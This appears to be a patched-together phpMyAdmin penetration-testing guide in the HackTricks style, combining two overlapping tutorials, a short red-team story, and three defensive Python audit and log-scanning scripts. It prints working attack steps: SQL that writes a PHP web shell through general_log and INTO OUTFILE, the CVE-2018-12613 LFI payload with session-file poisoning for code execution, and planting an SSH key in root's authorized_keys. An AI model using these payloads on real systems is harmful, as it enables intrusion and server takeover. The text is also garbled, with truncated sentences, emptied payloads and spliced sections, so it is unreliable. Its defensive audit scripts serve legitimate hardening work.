This guide follows the HackTricks methodology for pentesting phpMyAdmin, a common web-based tool for managing MySQL and MariaDB databases. (Source: book.hacktricks.xyz)

1. Initial Reconnaissance & Enumeration
Before attempting an exploit, identify the environment and version:

Version Identification: Look for version strings in the footer of the login page or in files like
Absolute Path Leakage: Check for common error pages or, once logged in, run SELECT @@datadir; to find where files are stored on the server.
Sensitive Files: Search for config.inc.php, which may contain database credentials or internal configuration secrets.

2. Authentication & Access

If the instance is not publicly open, try the following:

Default Credentials: Test common combinations like with an empty password.
Brute-Forcing: Use tools like to test for weak administrative passwords.
Credential Harvesting: If you have access to the file system (e.g., via another vulnerability), check wp-config.php (WordPress) or similar CMS configuration files for DB passwords. (Source: book.hacktricks.xyz)

3. Exploitation Techniques (Verified)
The primary goal in phpMyAdmin pentesting is often to escalate from database access to Remote Code Execution (RCE).

This article is designed for security professionals, penetration testers, and system administrators conducting authorized audits. It synthesizes common techniques with the rigor expected by the HackTricks methodology, ensuring each claim is verified against real-world configurations.
If secure_file_priv is set but you can change global variables:
```sql
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT "<?php system($_GET['c']); ?>";
```

Verification: Requires SUPER or ADMIN privilege. Works on MySQL 5.x/8.x if the log directory is writable by the mysql user.
INTO OUTFILE (Classic RCE): Requires the FILE privilege and knowledge of a writable web directory.

```sql
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php";
```

Check writable dirs:

```sql
SHOW VARIABLES LIKE 'secure_file_priv';
```

Bypass attempt: If secure_file_priv is null, use INTO DUMPFILE for binary writes.
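Both techniques above (the general_log redirect and INTO OUTFILE) depend on server settings a DBA can inspect in a minute, and the same settings are the subject of the INTO OUTFILE note in the second guide further down. The following Python audit is an added example, not code from HackTricks or the page's author: it parses the text that `SHOW VARIABLES` and `SHOW GRANTS` print in the mysql client (tab-separated rows) and flags an empty secure_file_priv, a general log written into a web-served directory, and accounts holding FILE or SUPER. The list of web roots and all sample output are constructed assumptions.

```python
"""Audit the MySQL/MariaDB settings that turn SQL access into file writes.

Added example for defenders; not code from HackTricks or the page's author.
It consumes the text a DBA gets from `SHOW VARIABLES` and `SHOW GRANTS`
in the mysql client (tab-separated rows) and flags the preconditions the
general_log and INTO OUTFILE techniques need: an empty secure_file_priv,
a general log written into a web-served directory, and accounts holding
FILE or SUPER. The web-root list and all sample output are constructed.
"""
import re

# Constructed assumption: directories served by the web server on this host.
WEB_ROOTS = ("/var/www", "/srv/http", "/usr/share/nginx/html")

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<obj>\S+)\s+TO\s+(?P<who>\S+)", re.IGNORECASE)

def parse_variables(text):
    """Parse `SHOW VARIABLES` output (Variable_name<TAB>Value per line) into a dict."""
    variables = {}
    for line in text.strip().splitlines():
        if "\t" not in line:
            continue
        name, _, value = line.partition("\t")
        if name == "Variable_name":          # header row from the client
            continue
        variables[name.strip()] = value.strip()
    return variables

def under_web_root(path):
    """True if path lies inside one of the configured web roots."""
    return any(path == root or path.startswith(root + "/") for root in WEB_ROOTS)

def audit_variables(variables):
    """Return (severity, message) findings for file-write related server variables."""
    findings = []
    sfp = variables.get("secure_file_priv")
    if sfp is None:
        findings.append(("INFO", "secure_file_priv not in dump; run SHOW VARIABLES LIKE 'secure_file_priv'"))
    elif sfp == "":
        findings.append(("HIGH", "secure_file_priv is empty: INTO OUTFILE/DUMPFILE can write anywhere the mysql user can"))
    elif sfp.upper() == "NULL":
        pass                                   # file import/export disabled entirely
    elif under_web_root(sfp):
        findings.append(("HIGH", f"secure_file_priv points inside a web root: {sfp}"))
    if variables.get("general_log", "OFF").upper() == "ON":
        log_file = variables.get("general_log_file", "")
        if under_web_root(log_file):
            findings.append(("CRITICAL", f"general_log is ON and its file is web-served: {log_file}"))
        else:
            findings.append(("MEDIUM", f"general_log is ON ({log_file}); every statement is written to disk"))
    return findings

def audit_grants(text):
    """Return findings for accounts whose grants allow file writes or global variable changes."""
    findings = []
    for line in text.strip().splitlines():
        m = GRANT_RE.match(line.strip())
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        who = m.group("who")
        if m.group("obj") == "*.*" and privs & {"ALL PRIVILEGES", "FILE"}:
            findings.append(("HIGH", f"{who} holds FILE (or ALL) on *.*: can read/write server files"))
        if privs & {"ALL PRIVILEGES", "SUPER"}:
            findings.append(("HIGH", f"{who} holds SUPER (or ALL): can change global variables such as general_log_file"))
    return findings

def run_audit(variables_text, grants_text):
    """Combine both checks; an empty list means none of the audited conditions were found."""
    return audit_variables(parse_variables(variables_text)) + audit_grants(grants_text)

# Constructed sample output from a poorly configured server.
SAMPLE_VARIABLES = """Variable_name\tValue
general_log\tON
general_log_file\t/var/www/html/shell.php
secure_file_priv\t
version\t8.0.36
"""
SAMPLE_GRANTS = """GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` WITH GRANT OPTION
GRANT USAGE ON *.* TO `pma`@`localhost`
GRANT SELECT, INSERT, UPDATE, DELETE ON `phpmyadmin`.* TO `pma`@`localhost`
GRANT FILE ON *.* TO `app`@`%`
"""

if __name__ == "__main__":
    for severity, message in run_audit(SAMPLE_VARIABLES, SAMPLE_GRANTS):
        print(f"[{severity}] {message}")
```

A server that passes this audit has secure_file_priv set to NULL or to a directory outside every web root, the general log off (or written where the web server cannot serve it), and FILE and SUPER limited to the DBA account; the phpMyAdmin control user in the sample deliberately holds neither.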
phpMyAdmin is vulnerable to LFI attacks due to improper input validation. An attacker can exploit this vulnerability to read sensitive files on the server.

Exploitation Steps:
/etc/passwd).

Mitigation:
allow_url_fopen directive in php.ini.

If an attacker can read config.inc.php (via LFI, path traversal, or backup files), they might find:

```php
$cfg['Servers'][$i]['controluser'] = 'pma_user';
$cfg['Servers'][$i]['controlpass'] = 'secret';
```

These credentials often have broad privileges.
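Since the exposure above is entirely a matter of what config.inc.php contains, a defender can audit the file before anyone else reads it; the same check covers the "config" auth type with hardcoded credentials mentioned in the second guide below. The following Python checker is an added example, not phpMyAdmin's or HackTricks' code: it reads the $cfg['Servers'][$i]['...'] assignments with a regex and flags a 'config' auth_type with a hardcoded user, a stored controluser/controlpass pair, and AllowNoPassword. Both sample configurations are constructed.

```python
"""Audit a phpMyAdmin config.inc.php for settings that hand out database access
to whoever manages to read the file (LFI, path traversal, a leftover backup).

Added example for defenders; not phpMyAdmin's or HackTricks' code. It reads the
$cfg['Servers'][$i]['...'] assignments with a regex and flags a 'config'
auth_type with a hardcoded user, a stored controluser/controlpass pair, and
AllowNoPassword. Both sample configurations below are constructed.
"""
import re

# One server setting per line, e.g. $cfg['Servers'][$i]['controlpass'] = 'secret';
SERVER_SETTING_RE = re.compile(
    r"^\s*\$cfg\['Servers'\]\[\$i\]\['(?P<key>\w+)'\]\s*=\s*(?P<value>.+?);\s*(?://.*|#.*)?$",
    re.MULTILINE)

def parse_server_settings(php_source):
    """Return {key: value}; quoted strings lose their quotes, true/false become bool."""
    settings = {}
    for m in SERVER_SETTING_RE.finditer(php_source):
        raw = m.group("value").strip()
        if len(raw) >= 2 and raw[0] == raw[-1] and raw[0] in ("'", '"'):
            value = raw[1:-1]
        elif raw.lower() in ("true", "false"):
            value = raw.lower() == "true"
        else:
            value = raw                        # expressions, numbers: keep as text
        settings[m.group("key")] = value
    return settings

def audit_config(php_source):
    """Return (severity, message) findings for the credential-related settings."""
    s = parse_server_settings(php_source)
    findings = []
    if s.get("auth_type") == "config":
        if s.get("user"):
            findings.append(("CRITICAL", f"auth_type 'config' with hardcoded user '{s['user']}': "
                                         "reaching the login URL is enough to be logged in"))
        else:
            findings.append(("HIGH", "auth_type 'config': credentials come from the file, not the user"))
    if s.get("controluser") and s.get("controlpass"):
        findings.append(("HIGH", f"controluser '{s['controluser']}' has its password in the file; "
                                 "reading the file yields that account's privileges"))
    if s.get("AllowNoPassword") is True:
        findings.append(("MEDIUM", "AllowNoPassword is true: accounts with an empty password can log in"))
    return findings

# Constructed samples, written in phpMyAdmin's config.inc.php assignment form.
VULNERABLE_CONFIG = """<?php
$i = 0;
$i++;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
$cfg['Servers'][$i]['controluser'] = 'pma_user';
$cfg['Servers'][$i]['controlpass'] = 'secret';
"""
HARDENED_CONFIG = """<?php
$i = 0;
$i++;
$cfg['Servers'][$i]['auth_type'] = 'cookie';   // user supplies credentials at login
$cfg['Servers'][$i]['AllowNoPassword'] = false;
// $cfg['Servers'][$i]['controlpass'] = 'secret';   // commented out: not parsed
"""

if __name__ == "__main__":
    for name, src in (("vulnerable", VULNERABLE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_config(src) or "no findings")
```

Run it against the live file and against any config.inc.php.bak, .swp or .orig copies in the same directory; a backup copy that still fails the check is as useful to an attacker as the file itself.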
These techniques have been verified on:
Always obtain proper authorization before testing any of these techniques on non-owned systems.
This post is for educational and authorized security testing purposes only.
Mastering phpMyAdmin Pentesting: A "HackTricks Verified" Guide

phpMyAdmin is the ubiquitous web interface for managing MySQL and MariaDB databases. Because it sits directly on top of sensitive data, it is a primary target for security researchers and attackers alike. Drawing from the methodologies popularized by resources like HackTricks, this guide outlines the verified techniques for enumerating, exploiting, and securing phpMyAdmin installations.

1. Initial Reconnaissance & Version Fingerprinting
Before launching an attack, you must understand the environment. phpMyAdmin’s vulnerability profile changes drastically between versions.
Version Identification: Look at the footer of the login page or check /README or /Documentation.html.
Default Credentials: Many installations still use root with a blank password or admin / password.
Setup Directory: Check if the /setup/ directory is accessible. If left unconfigured, it can sometimes be used to trick the application into connecting to a remote, malicious database server.

2. Exploiting Authentication

If default credentials fail, the next step is bypassing or forcing entry.

Dictionary Attacks

phpMyAdmin does not always have built-in rate limiting. Using tools like Burp Suite Intruder or THC-Hydra, you can perform a dictionary attack against the pma_username and pma_password fields.

Information Schema Leakage

In some misconfigured environments, a "config" auth type might be used where the credentials are hardcoded. If you find a way to read config.inc.php (via Local File Inclusion), you gain instant access.

3. Post-Auth Exploitation: From SQL to RCE

Once you have authenticated access (even as a low-privilege user), your goal is to escalate to the underlying operating system.

A. SELECT INTO OUTFILE (The Classic Web Shell)
If the MySQL user has the FILE privilege and you know the absolute path of the webroot, you can write a PHP shell directly to the server.
```sql
SELECT '' INTO OUTFILE '/var/www/html/shell.php';
```

Note: This requires the secure_file_priv variable to be empty or pointing to the webroot.

B. CVE-2018-12613 (Local File Inclusion)

One of the most famous "HackTricks verified" vulnerabilities. In versions 4.8.0 through 4.8.1, a flaw in the page redirection logic allowed for LFI.

The Payload:

index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

Attackers combine this with Session File Poisoning:

1. Run SELECT ''; to store the shell in your session file.
2. Find your session ID (from the phpMyAdmin cookie).
3. Use the LFI to include /var/lib/php/sessions/sess_[YOUR_ID].

C. CVE-2016-5734 (RCE via preg_replace)

In phpMyAdmin 4.3.0 to 4.6.2, a vulnerability in the search feature allowed attackers to execute code through the PHP preg_replace function using the /e (eval) modifier.

4. Advanced Enumeration: HackTricks Style
If you are stuck within the database, look for these "Quick Wins":
User Table Extraction: Hunt for wp_users (WordPress) or users tables to dump hashes for other services.
Sensitive Configs: Query tables that might store API keys or plaintext credentials for integrated services.
UDF (User Defined Functions): If the server is running on Windows and you have high privileges, you can attempt to drop a DLL to gain OS-level execution.

5. Defensive Hardening (The "Verified" Fixes)
To prevent your server from appearing in a pentester's report, follow these industry standards:
Restrict Access by IP: Never leave phpMyAdmin open to the world. Use .htaccess or Nginx rules to allow only trusted IPs.
Change the Alias: Move the interface from /phpmyadmin to a random string like /secret_db_9921.
Disable Root Login: Force users to login via a non-root account and use sudo-like permissions within MySQL.
Update Religiously: Most RCE exploits target versions that are 5+ years old.

Summary Table: phpMyAdmin Attack Vectors

| Attack Vector        | Requirement                 | Outcome                   |
|----------------------|-----------------------------|---------------------------|
| Default Creds        | Poor Configuration          | Full DB Access            |
| LFI (CVE-2018-12613) | Version 4.8.x               | RCE via Session Poisoning |
| SELECT INTO OUTFILE  | FILE Privilege + Known Path |                           |
| Setup Script Bypass  | Accessible /setup/ folder   | Config Manipulation       |
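The LFI chain in section B above (the double-encoded CVE-2018-12613 payload, then inclusion of a PHP session file) leaves a distinctive trace in web server access logs. The following scanner is an added example, not code from HackTricks or the page's author: it URL-decodes the target parameter twice, the way the double-encoded payload intends, and flags a '?' followed by '../', reporting separately when the traversal points at a session file. The log lines, client addresses and session id are constructed.

```python
"""Flag CVE-2018-12613-style LFI attempts against phpMyAdmin in access logs.

Added example for defenders; not code from HackTricks or the page's author.
The 4.8.0/4.8.1 flaw accepted a `target` value that starts with an allowed
page (db_sql.php) but carries a URL-encoded '?' followed by a '../'
traversal; because phpMyAdmin decoded the value one more time than the web
server did, payloads arrive double-encoded (%253f). This scanner decodes
twice, the same way, and reports the decoded target. All log lines,
addresses and the session id below are constructed.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request part of an Apache/Nginx combined-format log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+"')
# A '?' inside the target, followed anywhere later by a directory traversal.
TRAVERSAL_RE = re.compile(r"\?.*(?:\.\./|\.\.\\)")

def decode_target(url):
    """Return the `target` query parameter after two rounds of URL decoding, or None."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)  # first decode: %25 -> %
    if "target" not in params:
        return None
    return unquote(params["target"][0])                                # second decode: %3f -> ?

def classify_request(url):
    """Return an alert label for a suspicious request, or None for a benign one."""
    target = decode_target(url)
    if target is None or not TRAVERSAL_RE.search(target):
        return None
    if "/sess_" in target:
        return "lfi-session-file"    # traversal aimed at a PHP session file (RCE chain)
    return "lfi-traversal"

def scan_access_log(lines):
    """Scan combined-format log lines; return one alert dict per suspicious request."""
    alerts = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        verdict = classify_request(m.group("url"))
        if verdict:
            alerts.append({
                "line": lineno,
                "client": line.split(" ", 1)[0],
                "verdict": verdict,
                "target": decode_target(m.group("url")),
            })
    return alerts

# Constructed sample log: two attack requests, two benign ones, one single-encoded variant.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/2024:12:00:01 +0000] "GET /phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/May/2024:12:00:09 +0000] "GET /phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_CONSTRUCTEDID&cmd=whoami HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/May/2024:12:01:00 +0000] "GET /phpmyadmin/index.php?target=db_sql.php&db=shop HTTP/1.1" 200 9921 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/May/2024:12:01:02 +0000] "POST /phpmyadmin/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/May/2024:12:02:00 +0000] "GET /phpmyadmin/index.php?target=sql.php%3f/../../etc/hosts HTTP/1.1" 200 300 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(f"line {alert['line']}: {alert['client']} {alert['verdict']} -> {alert['target']}")
```

The single-encoded variant in the last sample line is caught as well, because parse_qs already performs one decode; a legitimate target such as db_sql.php never contains a '?' after decoding, which keeps the rule quiet on normal traffic. An "lfi-session-file" alert from a host still running 4.8.0 or 4.8.1 should be treated as a likely compromise rather than a probe.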
The air in the dimly lit room was thick with the hum of servers and the smell of stale coffee. Silas, a penetration tester for a mid-sized fintech firm, was deep into a red-team engagement. His target: a legacy web server that the client's IT department had "forgotten" to decommission. He pulled up the HackTricks phpMyAdmin guide, a resource he trusted for its verified, community-tested techniques. He had already identified an exposed /phpmyadmin directory. It was a classic "low-hanging fruit" scenario, but in cybersecurity, the simplest oversights often lead to the biggest breaches.

The Entry Point
Silas started with the basics. He tried common default credentials— with no password, admin/admin—but the login screen remained stubborn. He pivoted to the "verified" methods listed on HackTricks. He checked for the config.inc.php.swp file, hoping a developer had left a swap file behind during a late-night edit. No luck.

Then, he noticed something in the server headers: an outdated version of phpMyAdmin. He cross-referenced this with the HackTricks database and found a verified entry for CVE-2018-12613, a local file inclusion (LFI) vulnerability.
Following the verified steps, Silas crafted a specific URL payload: ://target.com

The browser refreshed. Instead of the login screen, a wall of text appeared—the server's /etc/passwd file. He was in. But LFI wasn't enough; he needed a shell. He remembered a specific trick from the HackTricks documentation regarding session files. He knew that phpMyAdmin stores session data in /var/lib/php/sessions/. If he could "poison" his own session with PHP code, he could execute commands via the LFI vulnerability.

The Final Move
Silas went back to the SQL execution tab (accessible even without a full login in some misconfigured setups) and ran:

```sql
SELECT '';
```

This small snippet of code was now sitting in a session file on the server's disk. He returned to his LFI payload, pointing it toward his session ID file:

index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_[HIS_SESSION_ID]&cmd=whoami

The page loaded. At the very top, in plain text, it read:

He had successfully turned a simple database management tool into a doorway for the entire network. He closed his laptop, ready to write the report that would hopefully convince the client to finally hit "delete" on that legacy server.
If secure_file_priv is empty and you can write to /root/.ssh/ (rare):

```sql
SELECT "ssh-rsa AAAAB3..." INTO OUTFILE "/root/.ssh/authorized_keys";
```